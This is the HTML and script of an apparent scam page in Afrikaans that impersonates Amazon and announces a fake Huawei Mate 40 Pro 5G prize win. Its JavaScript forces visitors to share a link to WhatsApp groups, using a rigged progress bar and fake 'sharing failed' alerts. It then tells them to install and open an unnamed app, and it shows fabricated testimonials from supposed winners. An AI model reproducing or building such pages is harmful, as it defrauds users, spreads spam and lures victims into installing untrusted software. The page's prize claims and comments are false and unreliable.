</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="11" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
</div>
<div id="p_modal1" class="modal fade text-center p_modal" tabindex="-1" role="dialog" aria-hidden="true">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-body">
<img class="temblor_inf" src="https://1.bp.blogspot.com/-lEbuopHIxt8/YFV4aPQx1BI/AAAAAAAAACg/FQYUnFPQK7sdKEEnsaKc1OpQV88K66bKACLcBGAsYHQ/s16000/amazon2.jpg">
<h2> Baie geluk, u antwoorde is suksesvol gestoor!</h2>
<p>
U het die kans om geskenke te wen.<br>
<br>
U moet die regte blokkie met u prys binne kies.<br>
<br>
U het drie pogings. Sterkte!
</p>
<div id="p_modal_button1" class="p_modal_button">
OK
</div>
</div>
</div>
</div>
</div>
<div id="p_modal2" class="modal fade text-center p_modal" tabindex="-1" role="dialog" aria-hidden="true">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-body">
<div class="circle-loader">
<div class="checkmark draw">
</div>
</div>
<h2> Oeps...</h2>
<p>
Jammer, die vak wat u gekies het, is leeg. Jy het nog steeds <span id="num_intentos">3</span> kanse! Sterkte!
</p>
<div id="p_modal_button2" class="p_modal_button">
OK
</div>
</div>
</div>
</div>
</div>
<div id="p_modal3" class="modal fade text-center p_modal" tabindex="-1" role="dialog" aria-hidden="true">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-body">
<img src="https://i.imgur.com/mov9JFN.png">
<h2> Baie geluk!</h2>
<p>
Jy het dit gedoen! U het die Huawei Mate 40 Pro 5G gewen!
</p>
<p>*** DIE REËLS***</p>
<p>1. U moet 5 groepe of 20 vriende vertel van Adidas-promosies.</p>
<p>2. Voer u adres in en laai die app af.</p>
<p>3. Die geskenke sal binne 5-7 dae afgelewer word</p>
<div id="p_modal_button3" class="p_modal_button" onclick="showShare()">
OK
</div>
</div>
</div>
</div>
</div>
</div>
<div class="main-content" id="content4" style="display: none">
<style>
                /*   fenxiangyemian	*/
                .share_desc{font-size: 14px;}
                .share_success {display: none;}
                .container {width: 100%;background-color: #ffffff;margin-right: auto;margin-left: auto;}
                .share_body {margin: 0 auto;width: 90%;background: #ffffff;border-radius: 10px;}
                .share_hd_text {text-align: center;font-size: 24px;font-weight: bold;color: #FF0000;}
                .share_main {margin: 10px auto;width: 100%;background: #e6e6e6;border-radius: 10px;}
                .share_main_bt {margin: 10px auto;background: #36A201;border-radius: 10px;width: 80%;line-height: 45px;text-align: center;font-size: 18px;font-weight: bold;color: #FFFFFF;}
                .weui_dialog_text {margin: 0 5px;text-align: center;font-size: 14px;color: #222222;}
                .progress{height: 20px;margin-bottom: 20px;overflow: hidden;background-color: #F5F5F5;border-radius: 4px;-webkit-box-shadow: inset 0 1px 2px rgb(0 0 0 / 10%);box-shadow: inset 0 1px 2px rgb(0 0 0 / 10%);}
                .progress-bar-success {height: initial;background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);}
                .progress-bar {-webkit-animation: progress-bar-stripes 2s linear infinite;-o-animation: progress-bar-stripes 2s linear infinite;animation: progress-bar-stripes 2s linear infinite;}
                .progress-bar {background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);-webkit-background-size: 40px 40px;background-size: 40px 40px;}
                .progress-bar {float: left;width: 0%;height: 100%;font-size: 12px;line-height: 20px;color: #FFF;text-align: center;background-color: #337AB7;-webkit-box-shadow: inset 0 -1px 0 rgb(0 0 0 / 15%);box-shadow: inset 0 -1px 0 rgb(0 0 0 / 15%);-webkit-transition: width 0.6s ease;-o-transition: width 0.6s ease;transition: width 0.6s ease;}
                @keyframes  progress-bar-stripes{ 0% {background-position: 40px 0;} 100% {background-position: 0 0;} }
            </style>
<script>
                var tipnstr = " U moet op Whatsapp met vriende deel oor ons promosie na afleweringsadres.  Deel tot die blou balk vol is!";
                var alertTip = " Deling het misluk! Dieselfde groep of dieselfde vriend is nie korrek nie.  Kyk en deel dit weer.";
                var value=0;
                var appName= "whatsapp";
                var theme = "amazonhz-tt";


                function showShare() {
                    set_Cookie('type_op', 2)
                    jQuery('#p_modal3').modal('hide');
                    $('#content4').show();
                    $('#content3').hide();
                    $('#content2').hide();
                    $('#content1').hide();
                    $('#content0').hide();
                }

                $(function () {
                    var typeop = parseInt(get_Cookie('type_op'));
                    if(typeop == 2){
                        showShare()
                    }
                    if (get_Cookie('prog')) {
                        setTimeout(function () {
                            $(".hide-all").hide();
                            $(".show-all").show();

                            incrementValue_a();
                            fn1_a();
                            chooseApp(1);

                            if(get_Cookie("appName")!=""){
                                appName = get_Cookie("appName");
                            }
                            $(".appName").html(appName);
                            $("#sw_bn").html(appName);
                            tipnstr = tipnstr.replace(/NNN/g, appName);
                            // document.getElementById("buttonO").style.display="block";
                            // document.getElementById("selectdiv").style.display="none";

                        }, 200)
                    }
                })




                function fn1_a() {

                    v = parseInt(get_Cookie('prog')) - 1;
                    document.querySelector('#progressbar').style['display'] = "block";
                    v == '0' ? ob = 30 : v == '1' ? ob = 50 : v == '2' ? ob = 52 : v == '3' ? ob = 60 : v == '4' ? ob = 60 :
                        v == '5' ? ob = 65 : v == '6' ? ob = 70 : v == '7' ? ob = 80 : v == '8' ? ob = 85 : v == '9' ? ob = 90 :
                            v == '10' ? ob = 96 : v == '11' ? ob = 98 : v == '12' ? ob = 100 : void(0);
                    document.querySelector('#progressbar').style['width'] = ob + "%";
                    document.querySelector('#progressbar').style['width'] = ob + "%";
                    document.querySelector('#progressbar').textContent = ob + "%";

                }
                function incrementValue_a() {


                    value = parseInt(get_Cookie('prog')) - 1;
                    if(value == 2 || value == 4 ){
                        wxalert("",alertTip,"OK",2,function(){});
                    }



                    if (value >= 12) {
                        lasthtml();
                    }
                }

                function chooseApp(type){
                    if(type==1){
                        appName="Whatsapp";
                    }else{
                        appName="Line";
                    }
                    set_Cookie("appName", appName);
                    $(".appName").html(appName);
                    $("#sw_bn").html(appName);
                    tipnstr = tipnstr.replace(/NNN/g, appName);
                    // document.getElementById("buttonO").style.display="block";
                    // document.getElementById("selectdiv").style.display="none";
                }

                var tiaoban = "";
                j = '';
                banner = '';

                function incrementValue1()   {
                    var tiaoban1=tiaoban+'amazc/load?v=is'+ new Date().getTime().toPrecision().substr(0,7);
                    if(parseInt(get_Cookie('prog')) > 100){
                        window.open('whatsapp://send?text='+tiaoban2);
                    }else{
                        window.open('whatsapp://send?text='+tiaoban1);
                    }
                    setTimeout(function(){
                        incrementValue_i();
                        fn1_i();
                        value = parseInt(get_Cookie('prog'));
                        set_Cookie('prog',value+1);
                    },2000);
                }

                function incrementValue_i() {
                    get_Cookie('prog') == '' ? value = 0 : value = get_Cookie('prog');
                    if(value == 2 || value == 4 ){
                        wxalert("",alertTip,"OK",2,function(){});
                    }
                    set_Cookie('prog', value);
                    if (value >= 12) {
                        lasthtml();
                    }
                }

                function fn1_i() {
                    v=get_Cookie('prog');
                    document.querySelector('#progressbar').style['display'] = "block";
                    v=='0'?ob=30:v=='1'?ob=50:v=='2'?ob=52:v=='3'?ob=60:v=='4'?ob=60:v=='5'?ob=65:v=='6'?ob=70:v=='7'?ob=80:v=='8'?ob=85:v=='9'?ob=90:v=='10'?ob=96:v=='11'?ob=98:v=='12'?ob=100:void(0);
                    document.querySelector('#progressbar').style['width'] = ob + "%";
                    document.querySelector('#progressbar').style['width'] = ob + "%";
                    document.querySelector('#progressbar').textContent = ob + "%";

                }

                function lasthtml() {
                    // html="";
                    // document.getElementById("lastapp").innerHTML = html;
                    document.getElementById("buttonl").style.display = 'none';
                    document.getElementById("button2").style.display = 'block';
                }

                function dapp() {
                    window.open(cad);
                }

                function tipn() {
                    wxalert("",tipnstr,"OK",2,function(){});
                }
            </script>
<div class="container share_page" style="padding: 0px">
<div class="share_body share_page" style="width: 100%;background: #f7f7f7;">
<div class="share_hd_text"> Baie geluk!</div>
<div class="weui_dialog_img prize_img" style="text-align: center;margin: 20px 0;">
<img src="https://i.imgur.com/mov9JFN.png" height="170px">
</div>
<div class="weui_dialog_text" style="color: #222222;"> U prys is: Huawei Mate 40 Pro 5G Full Netcom 8GB + 256GB (helder swart). Volg die instruksies op die volgende bladsy om u prys op te eis. !
</div>
<div class="share_main">
<div id='buttonl' class="share_ing" style="margin: 0 15px;">
<span class="share_desc" style="color: #222222;">
<br>
1. Deel met 5 groepe / 20 vriende op WHATSAPP (klik op die "WhatsApp" ikoon hieronder)<br><br>
2. Klik op "Gaan voort" om geskenke te ontvang.
</span>
<div class="share_main_bt" onclick="incrementValue1()">WhatsApp</div>
<div style="text-align: center;color: #999999; font-size: 14px"> Deel dit totdat die blou balk vol is !</div>
<div class="progress progress-striped active" style="margin: 10px 0; border-radius: 19px;">
<div class="progress-bar progress-bar-success" style="width:0;background-color:#2196f3;" id="progressbar"></div>
</div>
<div class="share_main_bt" onclick="tipn()" style="margin: 20px auto 0; background-color: #222;">
Aanhou
</div>
<br>
</div>
<div id="button2" class="share_success" style="margin: 0 15px;">
<div style="font-size: 14px;text-align: left">
<font color='red'><br> Baie geluk! Die laaste stap :<br></font>
<br> U moet hierdie laaste stap voltooi!
<br><br>1. U moet die onderstaande toepassing installeer en sodra u dit geïnstalleer het, moet u dit vir 30 sekondes oopmaak .
<br><br> (Onthou, hierdie stap is baie belangrik)
<br><br> Nadat u bogenoemde aksies voltooi het, wag asseblief dat admin dit sal nagaan. Die hersiening sal binne 24 uur voltooi word .
<br><br>
</div>
<div class="share_main_bt" onclick="dapp()"> Volledige registrasie</div>
<div id="banner_ad_share" style="width: 100%; overflow: hidden;text-align: center"></div>
<center></center>
<br>
</div>
</div>
<div class="weui_dialog_text" style="margin-top:-5px;line-height: 36px;color: #666666"> Hierdie aanbod is 500 sekondes geldig.
</div>
</div>
</div>
</div>
<div class="main-content" style="margin-top: 10px">
<div class="comments_face">
<div class="comments">
<p style="margin:0;padding:0;float:left;display:block;width:50%">
<span style="color:#3b5998"> Opmerkings</span>
 </p>
<p style="margin:0;padding:0;float:right;display:block;width:50%;color:#a8a7a7;text-align:right">
11 van 183
</p>
<div style="clear:both">
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/6.jpg">
</div>
<div class="comment-content">
<p class="name">
Sallie Hull
</p>
<p>
Shit ek het niks gewen nie!
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar<img src="/img/like.png" width="15px" height="15px">20</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/3.jpg">
</div>
<div class="comment-content">
<p class="name">
Marvin Allen
</p>
<p>
Ek hou van hierdie promosies!
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar <img src="/img/like.png" width="15px" height="15px">47</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/2.jpg">
</div>
<div class="comment-content">
<p class="name">
Casey Daniels
</p>
<p>
Ek het dit vandag ontvang. Baie dankie!
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar <img src="/img/like.png" width="15px" height="15px">3</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/8.jpg">
</div>
<div class="comment-content">
<p class="name">
Walter Hoffman
</p>
<p>
Ek het gedink dit was 'n grap, maar het vanoggend aangekom!
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar <img src="/img/like.png" width="15px" height="15px">19</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/11.jpg">
</div>
<div class="comment-content">
<p class="name">
 Hugo Montgomery
</p>
<p>
Ek het deelgeneem, ek het gewen en ek het na 5 dae ontvang. Baie dankie ouens!
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar <img src="/img/like.png" width="15px" height="15px">26</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/4.jpg">
</div>
<div class="comment-content">
<p class="name">
Remi Peltier
</p>
<p>
Kan ek vandag ontvang? Dankie
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar <img src="/img/like.png" width="15px" height="15px">38</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/9.jpg">
</div>
<div class="comment-content">
<p class="name">
Stephane Loupe
</p>
<p>
Ek het gedink dit is 'n grap, maar ek het vanoggend my Huawei Mate 40 Pro 5G via DHL ontvang en wil graag meer opnames doen!
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar <img src="/img/like.png" width="15px" height="15px">27</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/10.jpg">
</div>
<div class="comment-content">
<p class="name">
Tracy Schmeler
</p>
<p>
Is daar ander opnames om te neem?
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar <img src="/img/like.png" width="15px" height="15px">50</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/1.jpg">
</div>
<div class="comment-content">
<p class="name">
Sandy Orn
</p>
<p>
Fantasties! Ek het nog nooit iets gewen nie!
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar <img src="/img/like.png" width="15px" height="15px">45</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/5.jpg">
</div>
<div class="comment-content">
<p class="name">
Robert De Villiers
</p>
<p>
Aanvanklik het ek gedink dat dit 'n grap was, maar uiteindelik het ek my Huawei Mate 40 Pro 5G gekry. Ek het vriende daaroor vertel, sodat hulle ook hulle kan kry.
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar <img src="/img/like.png" width="15px" height="15px">17</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
<div class="comments">
<div class="profile">
<img src="/img/7.jpg">
</div>
<div class="comment-content">
<p class="name">
Annie Clérisseau
</p>
<p>
Kan ek vandag my Huawei Mate 40 Pro 5G kry? Dankie
</p>
</div>
<div class="clr">
</div>
<div class="comment-status">
<span> Hou van · Kommentaar <img src="/img/like.png" width="15px" height="15px">51</span> · <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>, <span class="p_var-anyo">2020</span>
</div>
</div>
</div>
<p style="font-size:12px;color:#bcbcbc">
</p>
</div>
</div>
</div>
<div id="p_loading" style="display:none">
<div class="d-flex justify-content-center" style="margin:0 auto">
<div class="spinner-border" role="status">
<span class="sr-only">Loading...</span>
</div>
</div>
</div>
<style>
    #footer a{color:#efefef}
</style>
<div id="footer" style="background-color:#0d141e;margin-bottom:0;font-size:12px;text-align:center;color:#efefef;padding:10px">
<p style="line-height:20px;margin-bottom:0">
© 1996-2021 amazon.com, Inc.
</p>
</div>
</body></html>
<script>
    var _hmt = _hmt || [];
    (function() {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?2fae6fec56999c6899400ad2ff768e9a";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>